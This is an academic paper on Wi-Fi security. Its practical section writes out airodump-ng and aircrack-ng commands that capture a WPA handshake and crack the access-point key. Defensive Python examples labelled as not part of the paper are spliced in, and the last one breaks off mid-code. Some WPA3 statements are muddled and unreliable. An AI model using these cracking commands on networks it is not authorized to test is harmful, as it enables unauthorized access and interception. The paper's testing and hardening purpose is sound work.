
Journal of Modern Technology and Engineering

Vol.8, No.3, 2023, pp.207-219

ENHANCING WIRELESS NETWORK SECURITY VIA ETHICAL HACKING: STRATEGIES AND BEST PRACTICES

Salah Abdulghani Alabady1, Mohammed A. M. Abdullah2, Kaeed Ketab Kaeed1

1 College of Engineering, Computer Engineering Department, University of Mosul, Iraq

2 Computer and Information Engineering Department, College of Electronics Engineering, Ninevah University, Mosul, Iraq

Abstract. Wireless networks have expanded rapidly in recent years and are now one of the fastest-growing segments of the telecommunications industry. Wireless communication technologies are popular because of their advantages over wireline systems, the most significant being the absence of cables, which permits the three paradigms of communication everywhere, at any time, with anybody. However, the convenience of WLANs brings greater security risks than those of the wired environment. Wireless data packets travel through the air and are available to anyone who can intercept and decode them, so the most significant source of risk in a wireless network is that the communication medium itself, the airwave, is open to intruders. This leads to the idea of ethical hacking. Ethical hacking, often known as white-hat hacking, is the use of hacking techniques to test and strengthen defenses against unethical hackers. It employs the same tools and tactics as unethical hacking, but it also requires substantial upfront planning, a set of specific tools, complicated testing processes, and adequate follow-up to resolve any issues before unethical hackers exploit them. In this paper, we present various threats and vulnerabilities associated with 802.11-based wireless networks and show how ethical hacking can be used to find the points of failure when trying to overcome these problems.

Keywords: Wireless Security, Ethical Hacking, IEEE 802.11, Performance Analysis


AMS Subject Classification: 68M15.
Corresponding author: Salah A. Alabady, College of Engineering, Computer Engineering Department, University of Mosul, Iraq, e-mail: [email protected]
Received: 12 February 2023; Revised: 18 July 2023; Accepted: 15 August 2023;
Published: 30 December 2023.

1 Introduction
Wireless networks have experienced rapid expansion in recent years and are now one of the fastest-growing industries in the telecoms sector. Wireless local area networks, cellular, cordless, and satellite phones, as well as other wireless communication technologies, are now widely used and regarded by many as indispensable tools for daily life. The benefits of wireless communication systems over wired systems account for their growing popularity. The lack of cables, which permits the three paradigms of communication (anywhere, anytime, with anyone), is the main benefit.
It is important to note that current standards-based wireless LANs function at fast rates Michael (2002). Typically, the speed ranges from 2 Mbps to over 54 Mbps. For a variety of applications or services delivered via a PC or mobile device, this bandwidth is unquestionably sufficient to provide an excellent user experience. Government organizations, individual consumers, and commercial enterprises all utilize or are considering adopting wireless technologies.

207
JOURNAL OF MODERN TECHNOLOGY AND ENGINEERING, V.8, N.3, 2023

These organizations should, however, be mindful of the security dangers connected to wireless technologies. As they integrate wireless technologies into their computer environments, agencies must create measures to reduce the hazards Gupta and Jha (2015), Alabady and Salleh (2013).
The main contribution of this paper is to present the main weaknesses of wireless networks together with proposed solutions and recommendations that can be adopted to protect them. In this context, a simple network is designed to simulate a practical eavesdropping scenario. Sniffing software is tested under both Windows and Linux environments, which demonstrated the weakness of the old security protocol.
The remainder of this paper is organized as follows. Section 2 explains the background and Section 3 reviews the related work. Section 4 describes the security characteristics of 802.11 wireless LANs. Section 5 evaluates the practical work and shows the results. Finally, Section 6 presents the recommendations and concluding remarks.

2 Background
Before diving into the details of wireless security, it is essential to know the wireless topology
and wireless standard protocols. These are going to be presented in the next sub-sections.

2.1 Wireless LAN Topology

In any wireless network, there are three topologies for wireless LANs:

• Infrastructure mode: A topology known as an infrastructure extends a wired LAN to wireless devices by providing a base station (also known as an access point). The access point serves as a central controller for the wireless LAN by bridging the wireless and wired networks.

• Ad-hoc mode: In an ad-hoc topology, a LAN is built entirely by the wireless devices themselves without the use of a central controller or access point. Instead of using a centralized controller, each device connects directly with the other devices in the network.

• Mixed Network mode: Every wireless station can operate in both of the aforementioned modes at once. The Extended Basic Service Set (EBSS) is another name for this Mao et al. (2018).

2.2 Wireless LAN Standard


• 802.11b: 802.11b was long recognized as the most extensively used Wi-Fi standard. It
makes use of frequencies between 2.400 and 2.485 GHz. The maximum 802.11b speed is
11 Mbps.

• 802.11g: The 802.11g protocol was approved in 2003 to match the 54-Mbps speed claims
of 802.11a. This protocol used the 2.4 GHz band of 802.11b and the OFDM modula-
tion method from 802.11a. It was able to maintain backward compatibility with 802.11b
equipment because it operated at 2.4 GHz.

• 802.11n: For several years, the IEEE 802.11 Task Group n (TGn) has been developing a new wireless standard that will offer significantly more application data throughput than the current 802.11a/b/g wireless standards. Solutions built on the 802.11n standard will support existing 802.11a/b/g deployments with a maximum data rate of 250 Mbps and operate in the 2.4-GHz, 5-GHz, or both radio bands Bendale and Prasad (2018).

208
S.A. ALABADY et al. ENHANCING WIRELESS NETWORK SECURITY VIA ETHICAL HACKING...

• 802.11i: The Working Group of IEEE 802.11 has been working on MAC enhancement.
Task Group I (TGi) is working on security. It replaced the previous security rules by pro-
viding a Robust Security Network (RSN) with two new protocols: the group key handshake
and the four-way handshake. These employ the port access control and authentication ser-
vices mentioned in IEEE 802.1X to establish the appropriate cryptographic keys He et al.
(2019).

• 802.11ac: The fifth version of WiFi is known as 802.11ac or WiFi 5. It is an improvement over IEEE 802.11n. In order to keep up with the increasing number of people, devices, and data usage, WiFi 5 was intended to have faster speeds, better WiFi performance, and better range. 802.11ac has a theoretical maximum speed of 1,300 Mbps (1.3 Gbps) to 2,300 Mbps (2.3 Gbps). The channel bandwidth of 802.11ac supports a maximum of 80 MHz.

• 802.11ax: The newest form of wireless technology is known as Wi-Fi 6. Compared to Wi-Fi 5, Wi-Fi 6 offers more coverage, longer battery life, and better performance. Wi-Fi 6 was initially intended to alleviate bandwidth issues in crowded, high-traffic areas like trains, stadiums, airports, and offices. 802.11ax radios can operate in both the 2.4 GHz and 5 GHz frequency bands. By using multiple channels, Wi-Fi 6 can reach a maximum speed of 9.6 Gbps.

3 Related work
The authors in Badholia et al. (2019) studied wireless network system (WNS) protocols, i.e. WEP, WAP, and WPA2, and proposed improved versions of these protocols built on algebraic, statistical, and logarithmic methods. Their results indicate that the upgraded versions of WEP, WAP, and WAP2 operate more effectively and securely. The authors of Faika et al. (2019) suggested using blockchain technology to protect an IoT-enabled WBMS's communication and data from harmful cyber-attacks; their experimental findings support the proposal. Each of five IoT Raspberry Pi 3 boards has a smart contract installed on the Hyperledger Fabric blockchain platform. In contrast to other blockchain platforms, they recommend using IBM's Hyperledger Fabric, which is more relevant to IoT applications. Their findings offer the possibility of improving the cyber security of WBMSs, which encourages the spread of Li-ion battery systems in cyber-physical environments.
In order to authenticate wireless devices, Lin and Chang (2019) offer a radio frequency fingerprint extraction technique based on the fractional Fourier transform of transient signals. The findings demonstrate that this method's recognition rate is very near 100% when the SNR is 20 dB. Ten Motorola walkie-talkies were also utilized to test the effectiveness of the identification procedure. The authors of Jilani et al. (2020) researched the risks associated with wireless sensor networks. DoS attacks, black hole attacks, and wormhole attacks were shown to be the most frequent dangers. They suggested a detection algorithm equipped to spot intrusions in changing real-world circumstances.
Kaur and Sandhu (2021) presented the various security measures that employ a machine learning (ML) strategy to counter intrusion attempts on network data. They classify security attacks by layer and kind and then use machine learning to determine the appropriate response. A schedule listing each layer name and its associated procedures was also created. Using open-source software and commercially accessible hardware, the authors of Hoseini et al. (2022) created a physical layer security solution for protecting wireless communications. This solution took advantage of the physical features of the wireless channel. In order to manage and degrade the quality of the eavesdropper's channel, they practically manipulated the connectivity of the legitimate station using the flexibility and control granularity offered by the relatively recent concept of spectrum programming.


Their success is attributed to the idea of spectrum programming, which is relatively new and enables the centralization of the required measurements and controls. Wu and Wu (2021) investigated the security issues in wireless sensor network applications and the mechanisms for protecting information security. They concluded that the only way to accelerate the advancement of productive forces and information technology was to grasp the trend of scientific and technological development and work to remove its shortcomings. The authors in Chen et al. (2021) proposed a new data processing method called Hex Word2Vec KMeans Smote (HWKS) to detect intrusions in wireless networks. They also proposed an improved version of the Aegean WiFi Intrusion Dataset (AWID). They support their proposal with experimental results which show that, on the one hand, the HWKS method is reasonable and the new AWID is more effective and challenging; on the other hand, data sets similar to AWID can be processed by the HWKS method, so the evaluation of different research work will be consistent and comparable.
Wireless networks can be protected from potential threats by using the network security monitoring system implemented by the authors in Maesaroh et al. (2022), which uses iptables as an attack handler and Snort as a sensor engine. They found that the Intrusion Detection System (IDS) detects threats by examining a variety of sources and network traffic. Additionally, they found that a computer network can only be monitored by a machine that functions as a sensor in the network and can witness all of the events that take place in it. For wireless mobile networks, the authors of Anitha et al. (2022) propose a reliable communication protocol with improved security handling capabilities, which they named the Novel Threat Management Scheme (NTMS). They developed their method by combining two traditional methods, AODV and data hashing, which together provide security effectiveness, data integrity, access control capability, and controlled bandwidth utilization.
Wi-Fi-related network attacks were researched by Liu (2022). By studying and evaluating network attack behaviors connected to Wi-Fi, he sought to identify and analyze preventative measures against wireless network security threats in order to enhance the security of wireless networks. He examined real-world examples of wireless network threats before putting forward workable solutions. For cooperative virtual networks in the IoT era, the authors of Alabady et al. (2020) presented a design of a typical network security paradigm. In addition to a policy to reduce those risks, this article covers and explores network security vulnerabilities, threats, attacks, and dangers in switches, firewalls, and routers. A network security model using a static VLAN and an AAA server with the TACACS+ protocol is presented in Alabady (2008). The planning and execution of a network security framework using routers and firewalls are presented in Alabady (2009). Additionally, that paper examined the network security flaws in router and firewall network devices, the different dangers and how to counteract them, as well as how to stop attacks and hacker access to the network.

4 802.11 Wireless LAN Security Features


Network security is the procedure used to safeguard digital information assets. The protection
of confidentiality, upkeep of integrity, and guarantee of availability are the main goals of security
Patil et al. (2020). In 802.11 networks, there are three primary ways to prevent unauthorized
access to an AP:

1. Service set identifier (SSID): An SSID associated with an AP or collection of APs can be used to obtain control over network access. A wireless network can be divided into different networks, each served by one or more APs, using the SSID technique. Each AP is pre-programmed with an SSID that corresponds to a particular wireless network. This is comparable to how wired LANs use the idea of a network address. The client's computer needs to be configured with the correct SSID in order to access a specific wireless network Pamarthi and Narmadha (2022).

2. MAC Address Filtering: The 802.11 network card in a client computer has a unique MAC address that can be used to identify it. To enhance AP access control, each AP can be programmed with a list of the MAC addresses of the client computers that are permitted access. A client whose MAC address is not included in this list, or whose configured SSID does not match the SSID of the AP, is not allowed to access the AP Nazir et al. (2021).

3. Wired Equivalent Privacy (WEP): WEP is part of the IEEE 802.11 WLAN specifications. Its main goal is to guarantee data secrecy over wireless networks at a level comparable to wired local area networks (LANs). Each data packet in WEP contains an integrity check field that is meant to ensure the data is not altered in transit Zaman et al. (2021), Jilani et al. (2020); a CRC-32 checksum is used for this. The WEP protocol consists of three parts: an initialization vector (IV) of 24 bits, a shared secret key (k, 40 or 104 bits), and the RC4 algorithm keyed with (IV, k). Using a shared secret key reduces the load on the AP, while presuming that whoever holds the secret key is a trusted individual. This shared key is never transmitted wirelessly. The installation of this key on workstations is not covered by the IEEE 802.11 specifications; each WS/AP requires manual installation. The majority of APs can manage four shared secret keys. A per-packet integer called the initialization vector is transmitted unencrypted over the air. Since it is one of the inputs to the RC4 method, it works best if it is produced randomly, but IEEE 802.11 does not specify IV generation, and in practice many cards produce IVs in a linear manner, that is, 1, 2, 3, etc. The RC4 method, with the IV and k as its inputs, produces a key stream K whose length equals that of the message delivered by the data-link layer. Initialization vectors are reused across encrypted packets, the algorithm used for the WEP 'hash' (the CRC-32 integrity check) was not designed for cryptographic use, and the most critical vulnerability is the widespread use of the same WEP key. These are only a few of WEP's many weaknesses Butt et al. (2019).
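The mechanics described above, as an added example that is not part of the paper: a minimal Python model of WEP encapsulation (24-bit IV sent in the clear, RC4 keyed with IV||k, CRC-32 integrity value) that shows why reusing an IV, or generating IVs with a linear counter, defeats a stream cipher, together with a defender-side check that flags repeated IVs in a capture. The key bytes, frame contents and the ICV byte order are constructed simplifications and do not reproduce the exact 802.11 frame layout.

```python
import struct
import zlib
from typing import Dict, List, Tuple

# Added example (not from the paper): a minimal model of WEP encapsulation
# showing why a 24-bit IV, RC4 and a CRC-32 "integrity" value are inadequate.
# Key sizes, IV size and the IV||k keying follow the paper's description;
# the ICV byte order and the demo key are constructed simplifications.


def rc4_keystream(key: bytes, length: int) -> bytes:
    """Plain RC4 (KSA + PRGA): returns `length` keystream bytes for `key`."""
    s = list(range(256))
    j = 0
    for i in range(256):                       # key-scheduling algorithm
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):                    # pseudo-random generation
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def crc32_icv(data: bytes) -> bytes:
    """WEP integrity check value: CRC-32 of the plaintext (not a keyed MAC)."""
    return struct.pack("<I", zlib.crc32(data) & 0xFFFFFFFF)


def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(k: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Frame body = IV (clear) || RC4(IV||k) XOR (plaintext || ICV)."""
    if len(iv) != 3 or len(k) not in (5, 13):  # 24-bit IV, 40- or 104-bit key
        raise ValueError("WEP needs a 3-byte IV and a 5- or 13-byte key")
    body = plaintext + crc32_icv(plaintext)
    return iv + xor_bytes(body, rc4_keystream(iv + k, len(body)))


def wep_decrypt(k: bytes, frame: bytes) -> Tuple[bytes, bool]:
    """Returns (plaintext, icv_ok); icv_ok is False if the frame was altered."""
    iv, body = frame[:3], frame[3:]
    plain = xor_bytes(body, rc4_keystream(iv + k, len(body)))
    data, icv = plain[:-4], plain[-4:]
    return data, icv == crc32_icv(data)


def keystream_reuse_leaks(k: bytes, iv: bytes, p1: bytes, p2: bytes) -> bool:
    """Two frames sent under the same IV share one keystream, so the XOR of
    their ciphertexts equals the XOR of their plaintexts. Nothing about the
    key is needed for this to hold; returns True when the relation holds."""
    c1 = wep_encrypt(k, iv, p1)[3:]
    c2 = wep_encrypt(k, iv, p2)[3:]
    return xor_bytes(c1, c2) == xor_bytes(p1 + crc32_icv(p1), p2 + crc32_icv(p2))


def linear_iv(counter: int) -> bytes:
    """IV generation as many cards did it (1, 2, 3, ...): wraps after 2**24 frames."""
    return (counter & 0xFFFFFF).to_bytes(3, "big")


def iv_reuse_report(frames: List[bytes]) -> Dict[bytes, int]:
    """Defender-side check over a capture: count the clear-text IVs and report
    every IV seen more than once (each repeat reuses a keystream)."""
    counts: Dict[bytes, int] = {}
    for frame in frames:
        counts[frame[:3]] = counts.get(frame[:3], 0) + 1
    return {iv: n for iv, n in counts.items() if n > 1}


if __name__ == "__main__":
    key = b"\x01\x02\x03\x04\x05"              # constructed 40-bit demo key
    frame = wep_encrypt(key, linear_iv(1), b"hello")
    print(wep_decrypt(key, frame))
    print(keystream_reuse_leaks(key, linear_iv(7), b"packet one!", b"packet two!"))
    print(linear_iv(2 ** 24) == linear_iv(0))  # counter wraps, IVs repeat
```

Because the ICV is an unkeyed CRC, `wep_decrypt` only tells the receiver that a frame was not corrupted by noise, not that it came from a key holder; and because the IV space is 2^24, a busy AP with a linear counter cycles through every IV, which is exactly what `iv_reuse_report` is meant to surface in a monitoring setup.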

4.1 Security Schemes in WLANs


Wired Equivalent Privacy (WEP), Wi-Fi Protected Access (WPA), Wi-Fi Protected Access 2 (WPA2), and Wi-Fi Protected Access 3 (WPA3) are the most recent and most reliable security methods defined for WLAN technology. These four security schemes have been implemented for the IEEE 802.11 standards. The WPA2 security scheme is a notable improvement over WPA and WEP because it uses the Counter Mode Cipher Block Chaining Message Authentication Code Protocol (CCMP), based on the Advanced Encryption Standard (AES) block cipher, instead of the Rivest Cipher 4 (RC4) stream cipher. However, WPA2 uses a pre-shared key (PSK); if an adversary obtains the shared key, he or she can exploit it to mount an attack (by decrypting the traffic). WPA3 solves this problem with the Simultaneous Authentication of Equals (SAE) handshake, a secure key establishment protocol also called the Dragonfly handshake. SAE uses password-based authentication rather than the PSK technique. Moreover, WPA3 adopts the latest security methods and mandates Protected Management Frames (PMF) to secure the management frames.
In the case of WPA3, it is likely to be difficult for an adversary to steal the wireless traffic of clients who are protected by WPA3. Even if an attacker has successfully guessed a client's password, he cannot obtain the session keys used for encryption and decryption. It is worth mentioning that this paper concentrates on the WPA3 security scheme because this scheme compensates for the issues that were introduced in the previous WLAN security schemes.


4.2 Ciphering Module of WPA3


WPA3 is a subset of, and the latest improvement to, the 802.11i security standard of WLAN technology for personal and enterprise networks. WPA3 enhances the encryption of wireless networks using a new encryption protocol called Galois Counter Mode Protocol (GCMP) with the Advanced Encryption Standard (AES) Ahmad et al. (2018). In addition, WPA3 improves the authentication of wireless networks with Simultaneous Authentication of Equals (SAE, defined as a secure key establishment protocol) using a key length of 128 or 192 bits, which offers a stronger defence against password guessing, whereas WPA2 relied on a pre-shared key (PSK). Further, WPA3 uses GCMP together with the secure hash algorithm (HMAC-SHA-384) Lamers et al. (2021). Therefore, WPA3 offers encryption (Elliptic Curve Cryptography with the 192-bit security suite), authentication (SAE), and data integrity (secure hash algorithm: SHA-1 or SHA-2).
WPA3 supports multiple operation modes; the mode best suited to the design of the substation network is WPA3 enterprise mode, because this mode is specialized for the industrial environment and enforces more robust secret security standards than the other modes Wang et al. (2020), Baray and Ojha (2021). Opportunistic Wireless Encryption (OWE), when used in enterprise mode, encrypts the interactions between wireless clients and the AP using a different key for each connection, so every wireless connection has unique encryption. It mandates Protected Management Frames (PMF) to protect the management frames exchanged between APs and wireless clients.

4.3 Wireless Network Security Threats


Because of their broadcast nature, wireless networks carry a greater risk of interception than wired networks. Here are some of the major threats to a wireless network Kamrul et al. (2022):

1. Sniffing to Eavesdrop: because wireless communication is broadcast over radio waves, eavesdroppers can easily pick up unencrypted messages and thereby reach sensitive network information.

2. Denial of service attacks (DoS): in this type, attackers flood the network with such a large number of requests that the network cannot handle them all, which leads to a network crash.

3. Rogue Access Points: a technique for installing an unsecured access point inside the firewall in order to open a back door into the trusted network.

4. Network Abuses: Authorized users are also able to compromise the security of the network by abusing it, consuming bandwidth, slowing down connections, and obstructing a WLAN's overall performance.

5. Brute-Force Attack: This type of attack uses the "trial and error" method of guessing passwords. An attacker first gathers fundamental information about the user, for example the user's full name, room number, vehicle number, children's names, etc. The attacker continuously tries passwords built from the user's personal information until he/she succeeds. This may take hours, days, months, or even years.

5 Practical Work
In this work, ethical hacking is intended to understand the security bugs of IEEE 802.11.


5.1 Under Windows


The equipment used is a WLAN adapter (3Com with Atheros chipset), a personal computer (P4), a laptop (P4), and access points (D-Link, Micronet, Cisco). Wireless scanning programs such as NetStumbler, Aire1.0 and CommView are also needed for scanning and hacking Wi-Fi signals. NetStumbler is used to find AP information such as the MAC address of the AP, the SSID, the WLAN channel, and the SNR of the WLAN, as shown in Figure 1. We note that if the "Disable SSID Broadcast" option is selected in the Cisco AP settings, NetStumbler could not find the AP signal, so we used CommView to find the Wi-Fi signal.

Figure 1: Output of NetStumbler

CommView gives more options than NetStumbler, such as packet capture, a statistics view of how a station and AP connect with each other, the packets transferred, and other options, as shown in Figures 2 and 3.

Figure 2: CommView for WiFi

An Atheros driver is used to put the WLAN adapter into monitor mode under Windows; Figure 4 shows the installation of the Atheros driver. With a D-Link (DWL-2000AP) we built a simple network and tried to access it. Then, using AiroWizard 1.0 with the Aircrack-ng and Airodump-ng options, enough data (more than 10,000 IVs) is collected, after which the Aircrack option recovers the AP key. The AP key is displayed in ASCII. Figure 5 shows a capture of the AiroWizard 1.0 program with the AP key found.


Figure 3: Statistics view of how station and AP connect with each other

Figure 4: Wireless network adapter installation

5.2 Under Linux


Linux (BackTrack v2) is used for getting the AP key. It is a live CD, meaning that it boots directly from the disc without installation, and it comes with a wide spectrum of hacking programs already installed. Cracking WPA differs from cracking WEP: it does not depend on collecting packets but on capturing the handshake. This can be achieved either actively or passively. "Actively" means that the capture is accelerated by de-authenticating an existing wireless client so that it re-authenticates. "Passively" refers to the act of patiently awaiting a wireless client's WPA network authentication.

Figure 5: AiroWizard capture with AP key found

To put the WLAN adapter into monitor mode the following commands are used:
# wlanconfig ath0 create wlandev wifi0 wlanmode monitor
# ifconfig ath0 up
For finding wireless APs the following command is used:
# iwlist ath0 scan
Figure 6 shows the results of the scanning for WLAN networks

Figure 6: Scanning for WLAN Networks
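The scan step above, and the threats listed in Section 4.3 (rogue access points, sniffing of unencrypted traffic), can be turned into a routine audit. The following is an added example and not part of the paper: a Python script that parses the text layout printed by `iwlist <iface> scan`, classifies each cell as open, WEP or WPA/WPA2 from the `Encryption key` line and the presence of a WPA/RSN information element, and compares the BSSIDs seen against an inventory of sanctioned APs. The scan text and the allowlist are constructed for the example; the first BSSID is the one used in this section.

```python
import re
from typing import Dict, List

# Added example (not from the paper): audit an `iwlist <iface> scan` listing
# for weak encryption (open or WEP) and for access points that are not in the
# site inventory (rogue or "evil twin" APs). The sample output below is
# constructed; the field layout follows the wireless-tools text format, and the
# allowlist is an assumed site policy.

SAMPLE_SCAN = """\
ath0      Scan completed :
          Cell 01 - Address: 00:11:95:3C:2A:36
                    ESSID:"lab-net"
                    Mode:Master
                    Frequency:2.417 GHz (Channel 2)
                    Quality=70/70  Signal level=-40 dBm
                    Encryption key:on
                    IE: IEEE 802.11i/WPA2 Version 1
                        Group Cipher : CCMP
                        Pairwise Ciphers (1) : CCMP
                        Authentication Suites (1) : PSK
          Cell 02 - Address: 00:11:95:AA:BB:CC
                    ESSID:"lab-legacy"
                    Mode:Master
                    Frequency:2.437 GHz (Channel 6)
                    Quality=55/70  Signal level=-55 dBm
                    Encryption key:on
          Cell 03 - Address: 02:DE:AD:BE:EF:01
                    ESSID:"lab-net"
                    Mode:Master
                    Frequency:2.462 GHz (Channel 11)
                    Quality=40/70  Signal level=-70 dBm
                    Encryption key:off
"""

# Assumed inventory of sanctioned access points (BSSID -> expected SSID).
ALLOWED_APS = {
    "00:11:95:3C:2A:36": "lab-net",
    "00:11:95:AA:BB:CC": "lab-legacy",
}


def parse_iwlist(text: str) -> List[Dict[str, str]]:
    """Split the scan text into one dict per Cell with the fields we audit."""
    cells: List[Dict[str, str]] = []
    for raw in text.splitlines():
        line = raw.strip()
        m = re.match(r"Cell \d+ - Address: ([0-9A-Fa-f:]{17})", line)
        if m:
            cells.append({"bssid": m.group(1).upper(), "essid": "",
                          "encryption": "off", "ies": ""})
            continue
        if not cells:                      # header line before the first Cell
            continue
        cur = cells[-1]
        if line.startswith("ESSID:"):
            cur["essid"] = line[len("ESSID:"):].strip('"')
        elif line.startswith("Encryption key:"):
            cur["encryption"] = line.split(":", 1)[1]
        elif line.startswith("IE:"):       # WPA/RSN information elements
            cur["ies"] += line[3:].strip() + ";"
        elif line.startswith("Frequency:"):
            ch = re.search(r"Channel (\d+)", line)
            cur["channel"] = ch.group(1) if ch else "?"
    return cells


def classify_security(cell: Dict[str, str]) -> str:
    """OPEN if no encryption; WPA/WPA2 if a WPA/RSN IE is present; otherwise
    WEP (iwlist prints 'Encryption key:on' with no WPA IE for WEP networks)."""
    if cell["encryption"] != "on":
        return "OPEN"
    if "WPA" in cell["ies"]:
        return "WPA/WPA2"
    return "WEP"


def audit_scan(text: str, allowed: Dict[str, str]) -> List[str]:
    """One finding per problem: weak encryption, an AP missing from the
    inventory (rogue), or a known AP advertising an unexpected SSID."""
    findings: List[str] = []
    for cell in parse_iwlist(text):
        sec = classify_security(cell)
        tag = f"{cell['bssid']} ({cell['essid']!r}, ch {cell.get('channel', '?')})"
        if sec in ("OPEN", "WEP"):
            findings.append(f"WEAK-ENCRYPTION {sec}: {tag}")
        if cell["bssid"] not in allowed:
            findings.append(f"ROGUE-AP not in inventory: {tag}")
        elif allowed[cell["bssid"]] != cell["essid"]:
            findings.append(f"SSID-MISMATCH expected {allowed[cell['bssid']]!r}: {tag}")
    return findings


if __name__ == "__main__":
    for finding in audit_scan(SAMPLE_SCAN, ALLOWED_APS):
        print(finding)
```

On the constructed sample the audit reports the WEP-only legacy AP, the open third cell, and the fact that the third cell advertises the site SSID from a BSSID nobody provisioned, which is the rogue-AP pattern from Section 4.3. Run periodically from a sensor host, the same comparison against the inventory is a cheap wireless intrusion check that needs no special driver mode.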

Then, to start airodump-ng and collect the authentication handshake, we used the command
# airodump-ng -c 2 --bssid 00:11:95:3C:2A:36 -w work ath0


The purpose of this step is to capture the 4-way authentication handshake for the AP we
are interested in. Now to find the AP key we used the command
# aircrack-ng -w 1.lst work-01.cap
Figure 7 shows the capture of BackTrack v2 after finding the AP key.

Figure 7: Capture of BackTrack v2 after finding the AP key

6 Recommendations and Concluding Remarks


Although some wireless protocols have major security issues, several measures can be taken to secure wireless networks; they are listed below:

1. Enable WPA encryption instead of WEP: Weaknesses in the 802.11 WEP (Wired
Equivalency Privacy) encryption make it very simple for a determined user with the correct
tools to break the encryption and access the wireless network. WPA (Wi-Fi Protected
Access) is a superior method of WLAN security. Since WPA doesn’t restrict your password
characters to 0-9 and A-F like WEP does, it offers far better security and is simpler to
use. A more recent version, WPA3, is found in newer hardware and provides even stronger
encryption.

2. Using a strong encryption protocol: Using a recent encryption protocol such as WPA3 is recommended, because the old protocols such as WEP and WPA 1 are vulnerable to attacks, as was demonstrated in the practical part of this work.

3. Change the Administrator Password: Devices which serve as wireless access points often come with a default password. Many manufacturers' default passwords are well known and can be utilized to log into a network without permission. Therefore, change the administrator password to one of at least 8 characters including special symbols (such as #, $, and &). Also, avoid using personal information such as a birth date.

4. Keep the Access Point Software Up to Date: The maker of the wireless access
point sometimes offers software updates for the device to fix faults. It is highly advised to
frequently check the manufacturer’s website for any software updates for the device.

5. Reduce RF power transmission to the minimal level necessary: A common measure used to prevent an attack is turning the power down on the AP (if an internal WLAN network is used). By turning the power down, the range of the AP signal is reduced and hence the probability of an outsider attack is reduced.

6. Use directional antennas: The propagation of RF signals can be difficult to control and frequently isn't practicable. Usually, the RF energy will spread outside the stations' operating range. Using directional antennas on the access points is an additional security measure in addition to power-limiting transmission levels. The majority of access points ship standard with omnidirectional antennas, which emit the RF signal spherically with equal power in all directions. To stop RF signals from spreading, directional antennas can direct the energy in the desired direction.

7. MAC filtering: When this low-level security control is implemented on the access point,
only stations with specific MAC addresses will be able to connect with the access point.
By doing so, unauthorized access will be reduced.

8. Changing the encryption keys regularly: In order to prevent a compromised network from remaining compromised indefinitely, encryption keys should be changed. Even though there's always a chance that a hacker may be able to crack the encryption key a second time, changing keys gives them a little less incentive.

9. Disable Beacon Packets: Some APs have a setting that prohibits the AP from period-
ically broadcasting beacon packets to announce its presence. Before responding to traffic,
these APs demand that wireless network cards utilize the same SSID. This feature stops
some WLAN scanning programs from being used by hackers.
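The nine recommendations above, turned into a checklist auditor as an added example (this is example code, not from the paper): a Python function that takes an access point's settings as a dictionary and reports each recommendation the configuration violates, applied to a weak and a hardened configuration. The field names, the vendor-default password list, the firmware version strings and the thresholds (10 dBm, 90 days) are assumptions made for the illustration; the password rules are the ones the paper states (at least 8 characters, a symbol such as #, $ or &, no personal information such as a birth date).

```python
from datetime import date
from typing import Any, Dict, List, Optional

# Added example (not from the paper): audit an AP configuration against the
# nine recommendations of Section 6. Field names, the vendor-default list,
# the version strings and the thresholds are assumptions for illustration.

VENDOR_DEFAULT_PASSWORDS = {"admin", "password", "1234", ""}   # constructed
SPECIAL_SYMBOLS = set("#$&")                                   # symbols the paper names
ENCRYPTION_RANK = {"none": 0, "wep": 1, "wpa": 2, "wpa2": 3, "wpa3": 4}


def version_tuple(version: str) -> tuple:
    """'1.2.10' -> (1, 2, 10) so versions compare numerically, not as strings."""
    return tuple(int(part) for part in version.split("."))


def check_admin_password(pw: str, owner_birth: Optional[date] = None) -> List[str]:
    """Recommendation 3: not a default, at least 8 characters, a special symbol,
    and no personal information such as the owner's birth date."""
    issues: List[str] = []
    if pw.lower() in VENDOR_DEFAULT_PASSWORDS:
        issues.append("admin password is a vendor default")
    if len(pw) < 8:
        issues.append("admin password shorter than 8 characters")
    if not SPECIAL_SYMBOLS & set(pw):
        issues.append("admin password lacks a special symbol (#, $ or &)")
    if owner_birth is not None:
        for fmt in ("%d%m%Y", "%Y%m%d", "%Y"):      # common ways a date is typed
            if owner_birth.strftime(fmt) in pw:
                issues.append("admin password contains the owner's birth date")
                break
    return issues


def audit_ap(cfg: Dict[str, Any], latest_firmware: str,
             max_tx_dbm: int = 10, max_key_age_days: int = 90) -> List[str]:
    """Return one finding per violated recommendation (empty list = compliant)."""
    findings: List[str] = []
    enc = str(cfg.get("encryption", "none")).lower()
    if ENCRYPTION_RANK.get(enc, 0) < ENCRYPTION_RANK["wpa2"]:          # rec 1
        findings.append(f"rec 1: '{enc}' is breakable; enable WPA2 or WPA3")
    elif enc != "wpa3":                                                # rec 2
        findings.append("rec 2: WPA3 is available on newer hardware; prefer it")
    findings += ["rec 3: " + issue for issue in                        # rec 3
                 check_admin_password(cfg.get("admin_password", ""),
                                      cfg.get("owner_birth_date"))]
    if version_tuple(cfg["firmware"]) < version_tuple(latest_firmware):  # rec 4
        findings.append(f"rec 4: firmware {cfg['firmware']} is older than {latest_firmware}")
    if cfg.get("tx_power_dbm", 0) > max_tx_dbm:                        # rec 5
        findings.append(f"rec 5: tx power {cfg['tx_power_dbm']} dBm exceeds {max_tx_dbm} dBm")
    if cfg.get("antenna", "omni") == "omni":                           # rec 6
        findings.append("rec 6: omnidirectional antenna; consider a directional one")
    if not cfg.get("mac_filter_enabled", False):                       # rec 7
        findings.append("rec 7: MAC address filtering is disabled")
    if cfg.get("key_age_days", 0) > max_key_age_days:                  # rec 8
        findings.append(f"rec 8: encryption key is {cfg['key_age_days']} days old; rotate it")
    if cfg.get("ssid_broadcast", True):                                # rec 9
        findings.append("rec 9: beacon/SSID broadcast is enabled")
    return findings


# Two constructed configurations: factory-style and hardened.
WEAK_AP = {
    "encryption": "wep", "admin_password": "admin", "owner_birth_date": date(1990, 5, 1),
    "firmware": "1.0.2", "tx_power_dbm": 20, "antenna": "omni",
    "mac_filter_enabled": False, "key_age_days": 400, "ssid_broadcast": True,
}
HARDENED_AP = {
    "encryption": "wpa3", "admin_password": "Tr0ub4dor#&x!", "owner_birth_date": date(1990, 5, 1),
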